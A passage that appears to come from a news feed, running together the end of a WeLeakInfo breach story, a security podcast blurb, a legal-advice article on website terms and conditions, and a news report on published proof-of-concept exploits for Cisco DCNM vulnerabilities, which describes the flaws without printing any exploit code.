Jake Moore, cybersecurity specialist at ESET, argued that hackers can do a great deal of damage even just with limited sets of breached emails and names.

“The big risk comes from brute force attacks, where criminals use common password combinations against emails to try and break into personal accounts,” he added.

“An incredibly large amount of people still use predictable or simple passwords. Many people's passwords are also readily available on the dark web, so it quickly and simply becomes an exercise in joining the dots for the cyber-criminals.”

The FBI is seeking any information on the owners and operators of WeLeakInfo.

Analysis: Huawei 5G Dilemma

The latest edition of the ISMG Security Report discusses why Britain is struggling to determine whether to use China's Huawei technology in developing its 5G networks. Plus: An update on a mobile app exposing infant photos and videos online and an analyst's take on the future of deception technology.

What Website Owners Should Know About Terms and Conditions

All website owners should consider terms and conditions (T&Cs) to be a form of legal protection as they establish the responsibility and rights of the involved parties. T&Cs provide full security should anything go amiss and they also help you settle any disputes quickly without having to resort to the courts.

Is it a legal requirement to include T&Cs?
No, but it’s always best to include terms and conditions on your website as they will enable you to reduce your potential liabilities. It is essential that you let your customers or visitors know about their rights; if you’re not clear about your policies, they may dispute matters such as cancellation options, item returns and other rights, putting your company at a disadvantage. Additionally, if areas are unclear in your terms and conditions or even not mentioned, it may mean that you are liable to give your customer additional rights than are given under statutory.
Do you have to include GDPR provisions?
Website owners, even those outside the European Union (EU), should also consider incorporating the General Data Protection Regulation. Inserting a data protection clause can reassure your customers that their data will not be used for inappropriate purposes. You can include the majority of the GDPR obligations in your site’s privacy policy.

What should you include in the T&Cs?
If you are an online seller, it is essential to explain to customers the various processes involved, such as:
  • How to make a purchase
  • How to make a payment
  • How they will receive their products
  • How they can cancel orders
T&Cs help you establish boundaries by outlining what specific rights customers have. In return, you also inform them about your obligations as a seller and the limits of your legal liability.

What kind of protection can you expect from the T&Cs? It may not be uncommon for disputes to arise between you and your online customers or visitors. Therefore, it is essential to ensure that the terms and conditions are accessible, preferably on your website.

You also need to protect your website from copyright infringements. You can avoid potential disputes and confusion by specifying which sections are copyrighted and which are your intellectual property. You should also stipulate what visitors can do with your data. If there is any breach of your copyright or intellectual property, the terms and conditions should clearly explain how the problem will be resolved.

Are there standard T&Cs which apply to all websites?
There are general formats or templates of T&Cs that you can obtain for free online. However, there is always the possibility that these documents will not cover specific aspects of your business or will not include the relevant terms. If you omit an essential term from your website, you may find yourself vulnerable if a dispute arises. Therefore, it is critical that you customise your terms and conditions so they are suitable for your website and business.
  • Product and service offerings – No two businesses are alike, even if you sell the same products and services. For example, your competitor may only accept PayPal but you may allow other modes of payment.
  • Industry or target audience – In every industry, there are specific provisions that need to be included in the T&Cs. For example, customers may have a legal right to cancel or return their purchases within a specified period.
Can website owners enforce their T&Cs?
Your T&Cs are like any other enforceable contract. Nevertheless, you must ensure that they don’t contravene existing consumer laws or government regulations. Remember, you should only incorporate clauses that you can legally apply.

Terms and conditions are necessary for all businesses, including e-commerce sites. It is essential that you create T&Cs that are suitable for your products and services, and that they are legally enforceable. You also need to periodically review your T&Cs, especially if there have been any significant changes to your business structure or the law. Moreover, they must be accessible to your online customers and visitors. If they are not aware of your T&Cs, you may find it difficult to enforce them if a problem arises.

Written by Kerry Gibbs, a legal expert at BEB Contract and Legal Services.

Expert released PoC exploits for recently disclosed Cisco DCNM flaws

A researcher has publicly released some proof-of-concept (PoC) exploits and technical details for flaws in Cisco’s Data Center Network Manager (DCNM).

Early this month, Cisco released security updates for its Cisco’s Data Center Network Manager (DCNM) product that address several critical and high-severity vulnerabilities.

All the vulnerabilities were reported to Cisco through Trend Micro’s Zero Day Initiative (ZDI) and Accenture’s iDefense service by the security researcher Steven Seeley of Source Incite and Harrison Neal from PatchAdvisor.

Cisco published six advisories for a dozen vulnerabilities, eleven of them were reported by Seeley, three of these issues have been rated as critical and seven as high severity. The issues reported by Neal have been rated as medium severity.

Some of the critical flaws addressed by Cisco in DCNM could be exploited by attackers to bypass authentication and execute arbitrary actions with admin privileges on the vulnerable devices.

“Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.” reads the advisory published by Cisco.

“For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.”

The vulnerabilities have been tracked as CVE-2019-15975, CVE-2019-15976 and CVE-2019-15977. The issues affect the REST API endpoint, the SOAP API endpoint and the web-based management interface.

Cisco also addressed two of the high-severity SQL injection flaws that could be exploited by an attacker with administrative privileges to execute arbitrary SQL commands on a vulnerable device.

Three of the high-severity weaknesses could be exploited by an attacker to conduct path traversals, and two other high-severity issues by exploited by an attacker with admin rights to inject arbitrary commands on the underlying operating system.

Seeley provided technical details for three remote code execution chains and various techniques implemented in his exploits.

In this post, I share three (3) full exploitation chains and multiple primitives that can be used to compromise different installations and setups of the Cisco DCNM product to achieve unauthenticated remote code execution as SYSTEM/root. In the third chain, I (ab)use the java.lang.InheritableThreadLocal class to perform a shallow copy to gain access to a valid session.” wrote Seeley in a blog post.

Cisco only assigned 11 CVE identifiers to the flaws reported by Seeley, who anyway has found over 100 exploitable bugs, including a hundred SQL injection issues, two command injections, four instances of hardcoded keys and credentials, four cases of XML external entity (XXE) injection, and 20 file read/write/delete issues.

Cisco has updated the advisories informing its customers of the availability of PoC exploits.

“The Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerabilities that are described in this advisory.” states Cisco.

“Cisco PSIRT is not aware of any malicious use of the vulnerabilities that are described in this advisory. “

Pierluigi Paganini

(SecurityAffairs – Ciaco DCNM, hacking)

The post Expert released PoC exploits for recently disclosed Cisco DCNM flaws appeared first on Security Affairs.